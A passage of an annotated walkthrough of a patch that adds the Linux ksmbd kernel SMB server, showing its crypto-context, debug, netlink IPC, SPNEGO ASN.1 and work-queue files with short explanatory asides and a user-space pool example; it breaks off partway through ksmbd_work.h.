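#define POOL_CAP 4			/* stand-in for num_online_cpus() */

static pthread_mutex_t pool_lock = PTHREAD_MUTEX_INITIALIZER;
static pthread_cond_t  pool_wait = PTHREAD_COND_INITIALIZER;
static void *idle[POOL_CAP];
static int n_idle, n_live;

static void *pool_get(void)
{
	void *ctx;

	pthread_mutex_lock(&pool_lock);
	for (;;) {
		if (n_idle) {			/* reuse an idle context */
			ctx = idle[--n_idle];
			break;
		}
		if (n_live < POOL_CAP) {	/* still under the cap: grow */
			n_live++;
			pthread_mutex_unlock(&pool_lock);
			return calloc(1, 128);	/* stand-in for a real ctx */
		}
		/* at the cap: sleep until pool_put() signals a release */
		pthread_cond_wait(&pool_wait, &pool_lock);
	}
	pthread_mutex_unlock(&pool_lock);
	return ctx;
}

static void pool_put(void *ctx)
{
	pthread_mutex_lock(&pool_lock);
	idle[n_idle++] = ctx;
	pthread_mutex_unlock(&pool_lock);
	pthread_cond_signal(&pool_wait);
}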
+diff --git a/fs/smb/server/crypto_ctx.h b/fs/smb/server/crypto_ctx.h
+new file mode 100644
+index 0000000000000..4a367c62f6536
+--- /dev/null
++++ b/fs/smb/server/crypto_ctx.h
+@@ -0,0 +1,66 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2019 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __CRYPTO_CTX_H__
++#define __CRYPTO_CTX_H__
++
++#include <crypto/hash.h>
++#include <crypto/aead.h>
++
++enum {
++	CRYPTO_SHASH_HMACMD5	= 0,
++	CRYPTO_SHASH_HMACSHA256,
++	CRYPTO_SHASH_CMACAES,
++	CRYPTO_SHASH_SHA256,
++	CRYPTO_SHASH_SHA512,
++	CRYPTO_SHASH_MAX,
++};
++
++enum {
++	CRYPTO_AEAD_AES_GCM = 16,
++	CRYPTO_AEAD_AES_CCM,
++	CRYPTO_AEAD_MAX,
++};
++
++enum {
++	CRYPTO_BLK_ECBDES	= 32,
++	CRYPTO_BLK_MAX,
++};
++
++struct ksmbd_crypto_ctx {
++	struct list_head		list;
++
++	struct shash_desc		*desc[CRYPTO_SHASH_MAX];
++	struct crypto_aead		*ccmaes[CRYPTO_AEAD_MAX];
++};
++
++#define CRYPTO_HMACMD5(c)	((c)->desc[CRYPTO_SHASH_HMACMD5])
++#define CRYPTO_HMACSHA256(c)	((c)->desc[CRYPTO_SHASH_HMACSHA256])
++#define CRYPTO_CMACAES(c)	((c)->desc[CRYPTO_SHASH_CMACAES])
++#define CRYPTO_SHA256(c)	((c)->desc[CRYPTO_SHASH_SHA256])
++#define CRYPTO_SHA512(c)	((c)->desc[CRYPTO_SHASH_SHA512])
++
++#define CRYPTO_HMACMD5_TFM(c)	((c)->desc[CRYPTO_SHASH_HMACMD5]->tfm)
++#define CRYPTO_HMACSHA256_TFM(c)\
++				((c)->desc[CRYPTO_SHASH_HMACSHA256]->tfm)
++#define CRYPTO_CMACAES_TFM(c)	((c)->desc[CRYPTO_SHASH_CMACAES]->tfm)
++#define CRYPTO_SHA256_TFM(c)	((c)->desc[CRYPTO_SHASH_SHA256]->tfm)
++#define CRYPTO_SHA512_TFM(c)	((c)->desc[CRYPTO_SHASH_SHA512]->tfm)
++
++#define CRYPTO_GCM(c)		((c)->ccmaes[CRYPTO_AEAD_AES_GCM])
++#define CRYPTO_CCM(c)		((c)->ccmaes[CRYPTO_AEAD_AES_CCM])
++
++void ksmbd_release_crypto_ctx(struct ksmbd_crypto_ctx *ctx);
++struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_hmacmd5(void);
++struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_hmacsha256(void);
++struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_cmacaes(void);
++struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_sha512(void);
++struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_sha256(void);
++struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_gcm(void);
++struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_ccm(void);
++void ksmbd_crypto_destroy(void);
++int ksmbd_crypto_create(void);
++
++#endif /* __CRYPTO_CTX_H__ */
+diff --git a/fs/smb/server/glob.h b/fs/smb/server/glob.h
+new file mode 100644
+index 0000000000000..5b8f3e0ebdb36
+--- /dev/null
++++ b/fs/smb/server/glob.h
+@@ -0,0 +1,49 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __KSMBD_GLOB_H
++#define __KSMBD_GLOB_H
++
++#include <linux/ctype.h>
++
++#include "unicode.h"
++#include "vfs_cache.h"
++
++#define KSMBD_VERSION	"3.4.2"
++
++extern int ksmbd_debug_types;
++
++#define KSMBD_DEBUG_SMB		BIT(0)
++#define KSMBD_DEBUG_AUTH	BIT(1)
++#define KSMBD_DEBUG_VFS		BIT(2)
++#define KSMBD_DEBUG_OPLOCK      BIT(3)
++#define KSMBD_DEBUG_IPC         BIT(4)
++#define KSMBD_DEBUG_CONN        BIT(5)
++#define KSMBD_DEBUG_RDMA        BIT(6)
++#define KSMBD_DEBUG_ALL         (KSMBD_DEBUG_SMB | KSMBD_DEBUG_AUTH |	\
++				KSMBD_DEBUG_VFS | KSMBD_DEBUG_OPLOCK |	\
++				KSMBD_DEBUG_IPC | KSMBD_DEBUG_CONN |	\
++				KSMBD_DEBUG_RDMA)
++
++#ifdef pr_fmt
++#undef pr_fmt
++#endif
++
++#ifdef SUBMOD_NAME
++#define pr_fmt(fmt)	"ksmbd: " SUBMOD_NAME ": " fmt
++#else
++#define pr_fmt(fmt)	"ksmbd: " fmt
++#endif
++
++#define ksmbd_debug(type, fmt, ...)				\
++	do {							\
++		if (ksmbd_debug_types & KSMBD_DEBUG_##type)	\
++			pr_info(fmt, ##__VA_ARGS__);		\
++	} while (0)
++
++#define UNICODE_LEN(x)		((x) * 2)
++
++#endif /* __KSMBD_GLOB_H */
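Because ksmbd_debug() token-pastes its first argument onto KSMBD_DEBUG_, call sites name the class bare, and the message only fires when the matching bit is set in the runtime-tunable ksmbd_debug_types. A hypothetical call site (pdu_len is an invented local):

	/* expands to: if (ksmbd_debug_types & KSMBD_DEBUG_SMB) pr_info(...) */
	ksmbd_debug(SMB, "request buffer too small: %u bytes\n", pdu_len);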
+diff --git a/fs/smb/server/ksmbd_netlink.h b/fs/smb/server/ksmbd_netlink.h
+new file mode 100644
+index 0000000000000..ce866ff159bfe
+--- /dev/null
++++ b/fs/smb/server/ksmbd_netlink.h
+@@ -0,0 +1,412 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ *
++ *   linux-ksmbd-devel@lists.sourceforge.net
++ */
++
++#ifndef _LINUX_KSMBD_SERVER_H
++#define _LINUX_KSMBD_SERVER_H
++
++#include <linux/types.h>
++
++/*
++ * This is a userspace ABI to communicate data between ksmbd and user IPC
++ * daemon using netlink. This is added to track and cache user account DB
++ * and share configuration info from userspace.
++ *
++ *  - KSMBD_EVENT_HEARTBEAT_REQUEST(ksmbd_heartbeat)
++ *    This event is to check whether the user IPC daemon is alive. If the
++ *    user IPC daemon is dead, ksmbd keeps existing connections until they
++ *    disconnect, and new connections are denied.
++ *
++ *  - KSMBD_EVENT_STARTING_UP(ksmbd_startup_request)
++ *    This event is to receive the information that initializes the ksmbd
++ *    server from the user IPC daemon and to start the server. The global
++ *    section parameters are given from smb.conf as initialization
++ *    information.
++ *
++ *  - KSMBD_EVENT_SHUTTING_DOWN(ksmbd_shutdown_request)
++ *    This event is to shut down the ksmbd server.
++ *
++ *  - KSMBD_EVENT_LOGIN_REQUEST/RESPONSE(ksmbd_login_request/response)
++ *    This event is to get user account info from the user IPC daemon.
++ *
++ *  - KSMBD_EVENT_SHARE_CONFIG_REQUEST/RESPONSE(ksmbd_share_config_request/response)
++ *    This event is to get net share configuration info.
++ *
++ *  - KSMBD_EVENT_TREE_CONNECT_REQUEST/RESPONSE(ksmbd_tree_connect_request/response)
++ *    This event is to get session and tree connect info.
++ *
++ *  - KSMBD_EVENT_TREE_DISCONNECT_REQUEST(ksmbd_tree_disconnect_request)
++ *    This event is to send tree disconnect info to user IPC daemon.
++ *
++ *  - KSMBD_EVENT_LOGOUT_REQUEST(ksmbd_logout_request)
++ *    This event is to send logout request to user IPC daemon.
++ *
++ *  - KSMBD_EVENT_RPC_REQUEST/RESPONSE(ksmbd_rpc_command)
++ *    This event is to have DCE/RPC requests such as srvsvc, wkssvc, lsarpc
++ *    and samr processed in userspace.
++ *
++ *  - KSMBD_EVENT_SPNEGO_AUTHEN_REQUEST/RESPONSE(ksmbd_spnego_authen_request/response)
++ *    This event is to have Kerberos authentication processed in
++ *    userspace.
++ */
++
++#define KSMBD_GENL_NAME		"SMBD_GENL"
++#define KSMBD_GENL_VERSION		0x01
++
++#define KSMBD_REQ_MAX_ACCOUNT_NAME_SZ	48
++#define KSMBD_REQ_MAX_HASH_SZ		18
++#define KSMBD_REQ_MAX_SHARE_NAME	64
++
++/*
++ * IPC heartbeat frame to check whether user IPC daemon is alive.
++ */
++struct ksmbd_heartbeat {
++	__u32	handle;
++};
++
++/*
++ * Global config flags.
++ */
++#define KSMBD_GLOBAL_FLAG_INVALID		(0)
++#define KSMBD_GLOBAL_FLAG_SMB2_LEASES		BIT(0)
++#define KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION	BIT(1)
++#define KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL	BIT(2)
++
++/*
++ * IPC request for ksmbd server startup
++ */
++struct ksmbd_startup_request {
++	__u32	flags;			/* Flags for global config */
++	__s32	signing;		/* Signing enabled */
++	__s8	min_prot[16];		/* The minimum SMB protocol version */
++	__s8	max_prot[16];		/* The maximum SMB protocol version */
++	__s8	netbios_name[16];
++	__s8	work_group[64];		/* Workgroup */
++	__s8	server_string[64];	/* Server string */
++	__u16	tcp_port;		/* tcp port */
++	__u16	ipc_timeout;		/*
++					 * specifies the number of seconds the
++					 * server will wait for userspace to
++					 * reply to heartbeat frames.
++					 */
++	__u32	deadtime;		/* Number of minutes of inactivity */
++	__u32	file_max;		/* Limits the maximum number of open files */
++	__u32	smb2_max_write;		/* MAX write size */
++	__u32	smb2_max_read;		/* MAX read size */
++	__u32	smb2_max_trans;		/* MAX trans size */
++	__u32	share_fake_fscaps;	/*
++					 * Support some special applications that
++					 * make QFSINFO calls to check whether
++					 * we set the SPARSE_FILES bit (0x40).
++					 */
++	__u32	sub_auth[3];		/* Subauth value for Security ID */
++	__u32	smb2_max_credits;	/* MAX credits */
++	__u32	smbd_max_io_size;	/* smbd read write size */
++	__u32	max_connections;	/* Number of maximum simultaneous connections */
++	__u32	reserved[126];		/* Reserved room */
++	__u32	ifc_list_sz;		/* interfaces list size */
++	__s8	____payload[];
++};
++
++#define KSMBD_STARTUP_CONFIG_INTERFACES(s)	((s)->____payload)
++
++/*
++ * IPC request to shutdown ksmbd server.
++ */
++struct ksmbd_shutdown_request {
++	__s32	reserved[16];
++};
++
++/*
++ * IPC user login request.
++ */
++struct ksmbd_login_request {
++	__u32	handle;
++	__s8	account[KSMBD_REQ_MAX_ACCOUNT_NAME_SZ]; /* user account name */
++	__u32	reserved[16];				/* Reserved room */
++};
++
++/*
++ * IPC user login response.
++ */
++struct ksmbd_login_response {
++	__u32	handle;
++	__u32	gid;					/* group id */
++	__u32	uid;					/* user id */
++	__s8	account[KSMBD_REQ_MAX_ACCOUNT_NAME_SZ]; /* user account name */
++	__u16	status;
++	__u16	hash_sz;			/* hash size */
++	__s8	hash[KSMBD_REQ_MAX_HASH_SZ];	/* password hash */
++	__u32	reserved[16];			/* Reserved room */
++};
++
++/*
++ * IPC request to fetch net share config.
++ */
++struct ksmbd_share_config_request {
++	__u32	handle;
++	__s8	share_name[KSMBD_REQ_MAX_SHARE_NAME]; /* share name */
++	__u32	reserved[16];		/* Reserved room */
++};
++
++/*
++ * IPC response to the net share config request.
++ */
++struct ksmbd_share_config_response {
++	__u32	handle;
++	__u32	flags;
++	__u16	create_mask;
++	__u16	directory_mask;
++	__u16	force_create_mode;
++	__u16	force_directory_mode;
++	__u16	force_uid;
++	__u16	force_gid;
++	__s8	share_name[KSMBD_REQ_MAX_SHARE_NAME];
++	__u32	reserved[112];		/* Reserved room */
++	__u32	veto_list_sz;
++	__s8	____payload[];
++};
++
++#define KSMBD_SHARE_CONFIG_VETO_LIST(s)	((s)->____payload)
++
++static inline char *
++ksmbd_share_config_path(struct ksmbd_share_config_response *sc)
++{
++	char *p = sc->____payload;
++
++	if (sc->veto_list_sz)
++		p += sc->veto_list_sz + 1;
++
++	return p;
++}
++
++/*
++ * IPC request for tree connection. This request includes session and tree
++ * connect info from the client.
++ */
++struct ksmbd_tree_connect_request {
++	__u32	handle;
++	__u16	account_flags;
++	__u16	flags;
++	__u64	session_id;
++	__u64	connect_id;
++	__s8	account[KSMBD_REQ_MAX_ACCOUNT_NAME_SZ];
++	__s8	share[KSMBD_REQ_MAX_SHARE_NAME];
++	__s8	peer_addr[64];
++	__u32	reserved[16];		/* Reserved room */
++};
++
++/*
++ * IPC Response structure for tree connection.
++ */
++struct ksmbd_tree_connect_response {
++	__u32	handle;
++	__u16	status;
++	__u16	connection_flags;
++	__u32	reserved[16];		/* Reserved room */
++};
++
++/*
++ * IPC Request structure to disconnect tree connection.
++ */
++struct ksmbd_tree_disconnect_request {
++	__u64	session_id;	/* session id */
++	__u64	connect_id;	/* tree connection id */
++	__u32	reserved[16];	/* Reserved room */
++};
++
++/*
++ * IPC Request structure to logout user account.
++ */
++struct ksmbd_logout_request {
++	__s8	account[KSMBD_REQ_MAX_ACCOUNT_NAME_SZ]; /* user account name */
++	__u32	account_flags;
++	__u32	reserved[16];				/* Reserved room */
++};
++
++/*
++ * RPC command structure to send RPC requests such as srvsvc or wkssvc to
++ * the user IPC daemon.
++ */
++struct ksmbd_rpc_command {
++	__u32	handle;
++	__u32	flags;
++	__u32	payload_sz;
++	__u8	payload[];
++};
++
++/*
++ * IPC Request for Kerberos authentication
++ */
++struct ksmbd_spnego_authen_request {
++	__u32	handle;
++	__u16	spnego_blob_len;	/* the length of spnego_blob */
++	__u8	spnego_blob[];		/*
++					 * the GSS token from SecurityBuffer of
++					 * SMB2 SESSION SETUP request
++					 */
++};
++
++/*
++ * Response data which includes the GSS token and the session key generated by
++ * user daemon.
++ */
++struct ksmbd_spnego_authen_response {
++	__u32	handle;
++	struct ksmbd_login_response login_response; /*
++						     * the login response with
++						     * a user identified by the
++						     * GSS token from a client
++						     */
++	__u16	session_key_len; /* the length of the session key */
++	__u16	spnego_blob_len; /*
++				  * the length of the GSS token which will be
++				  * stored in SecurityBuffer of SMB2 SESSION
++				  * SETUP response
++				  */
++	__u8	payload[]; /* session key + AP_REP */
++};
++
++/*
++ * This is also used as the NETLINK attribute type value.
++ *
++ * NOTE:
++ * Response message type value should be equal to
++ * request message type value + 1.
++ */
++enum ksmbd_event {
++	KSMBD_EVENT_UNSPEC			= 0,
++	KSMBD_EVENT_HEARTBEAT_REQUEST,
++
++	KSMBD_EVENT_STARTING_UP,
++	KSMBD_EVENT_SHUTTING_DOWN,
++
++	KSMBD_EVENT_LOGIN_REQUEST,
++	KSMBD_EVENT_LOGIN_RESPONSE		= 5,
++
++	KSMBD_EVENT_SHARE_CONFIG_REQUEST,
++	KSMBD_EVENT_SHARE_CONFIG_RESPONSE,
++
++	KSMBD_EVENT_TREE_CONNECT_REQUEST,
++	KSMBD_EVENT_TREE_CONNECT_RESPONSE,
++
++	KSMBD_EVENT_TREE_DISCONNECT_REQUEST	= 10,
++
++	KSMBD_EVENT_LOGOUT_REQUEST,
++
++	KSMBD_EVENT_RPC_REQUEST,
++	KSMBD_EVENT_RPC_RESPONSE,
++
++	KSMBD_EVENT_SPNEGO_AUTHEN_REQUEST,
++	KSMBD_EVENT_SPNEGO_AUTHEN_RESPONSE	= 15,
++
++	KSMBD_EVENT_MAX
++};
++
++/*
++ * Enumeration for IPC tree connect status.
++ */
++enum KSMBD_TREE_CONN_STATUS {
++	KSMBD_TREE_CONN_STATUS_OK		= 0,
++	KSMBD_TREE_CONN_STATUS_NOMEM,
++	KSMBD_TREE_CONN_STATUS_NO_SHARE,
++	KSMBD_TREE_CONN_STATUS_NO_USER,
++	KSMBD_TREE_CONN_STATUS_INVALID_USER,
++	KSMBD_TREE_CONN_STATUS_HOST_DENIED	= 5,
++	KSMBD_TREE_CONN_STATUS_CONN_EXIST,
++	KSMBD_TREE_CONN_STATUS_TOO_MANY_CONNS,
++	KSMBD_TREE_CONN_STATUS_TOO_MANY_SESSIONS,
++	KSMBD_TREE_CONN_STATUS_ERROR,
++};
++
++/*
++ * User config flags.
++ */
++#define KSMBD_USER_FLAG_INVALID		(0)
++#define KSMBD_USER_FLAG_OK		BIT(0)
++#define KSMBD_USER_FLAG_BAD_PASSWORD	BIT(1)
++#define KSMBD_USER_FLAG_BAD_UID		BIT(2)
++#define KSMBD_USER_FLAG_BAD_USER	BIT(3)
++#define KSMBD_USER_FLAG_GUEST_ACCOUNT	BIT(4)
++#define KSMBD_USER_FLAG_DELAY_SESSION	BIT(5)
++
++/*
++ * Share config flags.
++ */
++#define KSMBD_SHARE_FLAG_INVALID		(0)
++#define KSMBD_SHARE_FLAG_AVAILABLE		BIT(0)
++#define KSMBD_SHARE_FLAG_BROWSEABLE		BIT(1)
++#define KSMBD_SHARE_FLAG_WRITEABLE		BIT(2)
++#define KSMBD_SHARE_FLAG_READONLY		BIT(3)
++#define KSMBD_SHARE_FLAG_GUEST_OK		BIT(4)
++#define KSMBD_SHARE_FLAG_GUEST_ONLY		BIT(5)
++#define KSMBD_SHARE_FLAG_STORE_DOS_ATTRS	BIT(6)
++#define KSMBD_SHARE_FLAG_OPLOCKS		BIT(7)
++#define KSMBD_SHARE_FLAG_PIPE			BIT(8)
++#define KSMBD_SHARE_FLAG_HIDE_DOT_FILES		BIT(9)
++#define KSMBD_SHARE_FLAG_INHERIT_OWNER		BIT(10)
++#define KSMBD_SHARE_FLAG_STREAMS		BIT(11)
++#define KSMBD_SHARE_FLAG_FOLLOW_SYMLINKS	BIT(12)
++#define KSMBD_SHARE_FLAG_ACL_XATTR		BIT(13)
++#define KSMBD_SHARE_FLAG_UPDATE		BIT(14)
++
++/*
++ * Tree connect request flags.
++ */
++#define KSMBD_TREE_CONN_FLAG_REQUEST_SMB1	(0)
++#define KSMBD_TREE_CONN_FLAG_REQUEST_IPV6	BIT(0)
++#define KSMBD_TREE_CONN_FLAG_REQUEST_SMB2	BIT(1)
++
++/*
++ * Tree connect flags.
++ */
++#define KSMBD_TREE_CONN_FLAG_GUEST_ACCOUNT	BIT(0)
++#define KSMBD_TREE_CONN_FLAG_READ_ONLY		BIT(1)
++#define KSMBD_TREE_CONN_FLAG_WRITABLE		BIT(2)
++#define KSMBD_TREE_CONN_FLAG_ADMIN_ACCOUNT	BIT(3)
++#define KSMBD_TREE_CONN_FLAG_UPDATE		BIT(4)
++
++/*
++ * RPC over IPC.
++ */
++#define KSMBD_RPC_METHOD_RETURN		BIT(0)
++#define KSMBD_RPC_SRVSVC_METHOD_INVOKE	BIT(1)
++#define KSMBD_RPC_SRVSVC_METHOD_RETURN	(KSMBD_RPC_SRVSVC_METHOD_INVOKE | KSMBD_RPC_METHOD_RETURN)
++#define KSMBD_RPC_WKSSVC_METHOD_INVOKE	BIT(2)
++#define KSMBD_RPC_WKSSVC_METHOD_RETURN	(KSMBD_RPC_WKSSVC_METHOD_INVOKE | KSMBD_RPC_METHOD_RETURN)
++#define KSMBD_RPC_IOCTL_METHOD		(BIT(3) | KSMBD_RPC_METHOD_RETURN)
++#define KSMBD_RPC_OPEN_METHOD		BIT(4)
++#define KSMBD_RPC_WRITE_METHOD		BIT(5)
++#define KSMBD_RPC_READ_METHOD		(BIT(6) | KSMBD_RPC_METHOD_RETURN)
++#define KSMBD_RPC_CLOSE_METHOD		BIT(7)
++#define KSMBD_RPC_RAP_METHOD		(BIT(8) | KSMBD_RPC_METHOD_RETURN)
++#define KSMBD_RPC_RESTRICTED_CONTEXT	BIT(9)
++#define KSMBD_RPC_SAMR_METHOD_INVOKE	BIT(10)
++#define KSMBD_RPC_SAMR_METHOD_RETURN	(KSMBD_RPC_SAMR_METHOD_INVOKE | KSMBD_RPC_METHOD_RETURN)
++#define KSMBD_RPC_LSARPC_METHOD_INVOKE	BIT(11)
++#define KSMBD_RPC_LSARPC_METHOD_RETURN	(KSMBD_RPC_LSARPC_METHOD_INVOKE | KSMBD_RPC_METHOD_RETURN)
++
++/*
++ * RPC status definitions.
++ */
++#define KSMBD_RPC_OK			0
++#define KSMBD_RPC_EBAD_FUNC		0x00000001
++#define KSMBD_RPC_EACCESS_DENIED	0x00000005
++#define KSMBD_RPC_EBAD_FID		0x00000006
++#define KSMBD_RPC_ENOMEM		0x00000008
++#define KSMBD_RPC_EBAD_DATA		0x0000000D
++#define KSMBD_RPC_ENOTIMPLEMENTED	0x00000040
++#define KSMBD_RPC_EINVALID_PARAMETER	0x00000057
++#define KSMBD_RPC_EMORE_DATA		0x000000EA
++#define KSMBD_RPC_EINVALID_LEVEL	0x0000007C
++#define KSMBD_RPC_SOME_NOT_MAPPED	0x00000107
++
++#define KSMBD_CONFIG_OPT_DISABLED	0
++#define KSMBD_CONFIG_OPT_ENABLED	1
++#define KSMBD_CONFIG_OPT_AUTO		2
++#define KSMBD_CONFIG_OPT_MANDATORY	3
++
++#endif /* _LINUX_KSMBD_SERVER_H */
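One detail of the event enum worth calling out: as the NOTE above states, a response's message type is always its request's type + 1 (LOGIN_REQUEST is 4, LOGIN_RESPONSE is 5, and so on), so the pairing can be computed rather than kept in a table. A hypothetical helper relying only on that documented rule:

/* Hypothetical helper; valid only for events that have a response. */
static inline enum ksmbd_event ksmbd_event_response(enum ksmbd_event req)
{
	return req + 1;	/* e.g. KSMBD_EVENT_SHARE_CONFIG_REQUEST -> _RESPONSE */
}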
+diff --git a/fs/smb/server/ksmbd_spnego_negtokeninit.asn1 b/fs/smb/server/ksmbd_spnego_negtokeninit.asn1
+new file mode 100644
+index 0000000000000..0065f191b54b7
+--- /dev/null
++++ b/fs/smb/server/ksmbd_spnego_negtokeninit.asn1
+@@ -0,0 +1,31 @@
++GSSAPI ::=
++	[APPLICATION 0] IMPLICIT SEQUENCE {
++		thisMech
++			OBJECT IDENTIFIER ({ksmbd_gssapi_this_mech}),
++		negotiationToken
++			NegotiationToken
++	}
++
++MechType ::= OBJECT IDENTIFIER ({ksmbd_neg_token_init_mech_type})
++
++MechTypeList ::= SEQUENCE OF MechType
++
++NegTokenInit ::=
++	SEQUENCE {
++		mechTypes
++			[0] MechTypeList,
++		reqFlags
++			[1] BIT STRING OPTIONAL,
++		mechToken
++			[2] OCTET STRING OPTIONAL ({ksmbd_neg_token_init_mech_token}),
++		mechListMIC
++			[3] OCTET STRING OPTIONAL
++	}
++
++NegotiationToken ::=
++	CHOICE {
++		negTokenInit
++			[0] NegTokenInit,
++		negTokenTarg
++			[1] ANY
++	}
+diff --git a/fs/smb/server/ksmbd_spnego_negtokentarg.asn1 b/fs/smb/server/ksmbd_spnego_negtokentarg.asn1
+new file mode 100644
+index 0000000000000..1151933e7b9c5
+--- /dev/null
++++ b/fs/smb/server/ksmbd_spnego_negtokentarg.asn1
+@@ -0,0 +1,19 @@
++GSSAPI ::=
++	CHOICE {
++		negTokenInit
++			[0] ANY,
++		negTokenTarg
++			[1] NegTokenTarg
++	}
++
++NegTokenTarg ::=
++	SEQUENCE {
++		negResult
++			[0] ENUMERATED OPTIONAL,
++		supportedMech
++			[1] OBJECT IDENTIFIER OPTIONAL,
++		responseToken
++			[2] OCTET STRING OPTIONAL ({ksmbd_neg_token_targ_resp_token}),
++		mechListMIC
++			[3] OCTET STRING OPTIONAL
++	}
+diff --git a/fs/smb/server/ksmbd_work.c b/fs/smb/server/ksmbd_work.c
+new file mode 100644
+index 0000000000000..14b9caebf7a4f
+--- /dev/null
++++ b/fs/smb/server/ksmbd_work.c
+@@ -0,0 +1,79 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2019 Samsung Electronics Co., Ltd.
++ */
++
++#include <linux/list.h>
++#include <linux/mm.h>
++#include <linux/slab.h>
++#include <linux/workqueue.h>
++
++#include "server.h"
++#include "connection.h"
++#include "ksmbd_work.h"
++#include "mgmt/ksmbd_ida.h"
++
++static struct kmem_cache *work_cache;
++static struct workqueue_struct *ksmbd_wq;
++
++struct ksmbd_work *ksmbd_alloc_work_struct(void)
++{
++	struct ksmbd_work *work = kmem_cache_zalloc(work_cache, GFP_KERNEL);
++
++	if (work) {
++		work->compound_fid = KSMBD_NO_FID;
++		work->compound_pfid = KSMBD_NO_FID;
++		INIT_LIST_HEAD(&work->request_entry);
++		INIT_LIST_HEAD(&work->async_request_entry);
++		INIT_LIST_HEAD(&work->fp_entry);
++		INIT_LIST_HEAD(&work->interim_entry);
++	}
++	return work;
++}
++
++void ksmbd_free_work_struct(struct ksmbd_work *work)
++{
++	WARN_ON(work->saved_cred != NULL);
++
++	kvfree(work->response_buf);
++	kvfree(work->aux_payload_buf);
++	kfree(work->tr_buf);
++	kvfree(work->request_buf);
++	if (work->async_id)
++		ksmbd_release_id(&work->conn->async_ida, work->async_id);
++	kmem_cache_free(work_cache, work);
++}
++
++void ksmbd_work_pool_destroy(void)
++{
++	kmem_cache_destroy(work_cache);
++}
++
++int ksmbd_work_pool_init(void)
++{
++	work_cache = kmem_cache_create("ksmbd_work_cache",
++				       sizeof(struct ksmbd_work), 0,
++				       SLAB_HWCACHE_ALIGN, NULL);
++	if (!work_cache)
++		return -ENOMEM;
++	return 0;
++}
++
++int ksmbd_workqueue_init(void)
++{
++	ksmbd_wq = alloc_workqueue("ksmbd-io", 0, 0);
++	if (!ksmbd_wq)
++		return -ENOMEM;
++	return 0;
++}
++
++void ksmbd_workqueue_destroy(void)
++{
++	destroy_workqueue(ksmbd_wq);
++	ksmbd_wq = NULL;
++}
++
++bool ksmbd_queue_work(struct ksmbd_work *work)
++{
++	return queue_work(ksmbd_wq, &work->work);
++}
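Taken together, the helpers above give each request a ksmbd_work allocated from a dedicated slab cache and executed on the ksmbd-io workqueue. A condensed sketch of the intended lifecycle, with an invented handler (the real dispatch lives elsewhere in the server):

static void hypothetical_handler(struct work_struct *wk)
{
	struct ksmbd_work *work = container_of(wk, struct ksmbd_work, work);

	/* ... process the SMB request carried by 'work' ... */
	ksmbd_free_work_struct(work);
}

static int hypothetical_dispatch(struct ksmbd_conn *conn)
{
	struct ksmbd_work *work = ksmbd_alloc_work_struct();

	if (!work)
		return -ENOMEM;
	work->conn = conn;
	INIT_WORK(&work->work, hypothetical_handler);
	return ksmbd_queue_work(work) ? 0 : -EINVAL;
}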
+diff --git a/fs/smb/server/ksmbd_work.h b/fs/smb/server/ksmbd_work.h
+new file mode 100644
+index 0000000000000..5ece58e40c979
+--- /dev/null
++++ b/fs/smb/server/ksmbd_work.h
+@@ -0,0 +1,117 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2019 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __KSMBD_WORK_H__
++#define __KSMBD_WORK_H__
++
++#include <linux/ctype.h>
++#include <linux/workqueue.h>
++
++struct ksmbd_conn;
++struct ksmbd_session;
++struct ksmbd_tree_connect;
++
++enum {
++	KSMBD_WORK_ACTIVE = 0,
++	KSMBD_WORK_CANCELLED,
++	KSMBD_WORK_CLOSED,
++};
++
++/* one of these for every pending CIFS request at the connection */
++struct ksmbd_work {
++	/* Server corresponding to this mid */
++	struct ksmbd_conn               *conn;
++	struct ksmbd_session            *sess;
++	struct ksmbd_tree_connect       *tcon;
++
++	/* Pointer to received SMB header */
++	void                            *request_buf;
++	/* Response buffer */
++	void                            *response_buf;
++
++	/* Read data buffer */
++	void                            *aux_payload_buf;
++
++	/* Next cmd hdr in compound req buf */
++	int                             next_smb2_rcv_hdr_off;
++	/* Next cmd hdr in compound rsp buf */
++	int                             next_smb2_rsp_hdr_off;
++
++	/*
++	 * Current local FID assigned to the compound response if an SMB2
++	 * CREATE command is present in the compound request
++	 */
++	u64				compound_fid;
++	u64				compound_pfid;
++	u64				compound_sid;
++
++	const struct cred		*saved_cred;
++
++	/* Number of granted credits */
++	unsigned int			credits_granted;
++
++	/* response smb header size */
++	unsigned int                    resp_hdr_sz;
++	unsigned int                    response_sz;
++	/* Read data count */
++	unsigned int                    aux_payload_sz;
++
++	void				*tr_buf;
++
++	unsigned char			state;
++	/* Multiple responses for one request e.g. SMB ECHO */
++	bool                            multiRsp:1;
++	/* No response for cancelled request */
++	bool                            send_no_response:1;
++	/* Request is encrypted */
++	bool                            encrypted:1;
++	/* Is this SYNC or ASYNC ksmbd_work */
++	bool                            syncronous:1;
++	bool                            need_invalidate_rkey:1;
++
++	unsigned int                    remote_key;
++	/* cancel works */
++	int                             async_id;
++	void                            **cancel_argv;
++	void                            (*cancel_fn)(void **argv);
++
++	struct work_struct              work;
++	/* List head at conn->requests */
++	struct list_head                request_entry;
++	/* List head at conn->async_requests */
++	struct list_head                async_request_entry;
++	struct list_head                fp_entry;
++	struct list_head                interim_entry;
++};
++
++/**
++ * ksmbd_resp_buf_next - Get next buffer on compound response.
++ * @work: smb work containing response buffer
++ */
++static inline void *ksmbd_resp_buf_next(struct ksmbd_work *work)
++{
++	return work->response_buf + work->next_smb2_rsp_hdr_off + 4;
++}
++
++/**
++ * ksmbd_req_buf_next - Get next buffer on compound request.
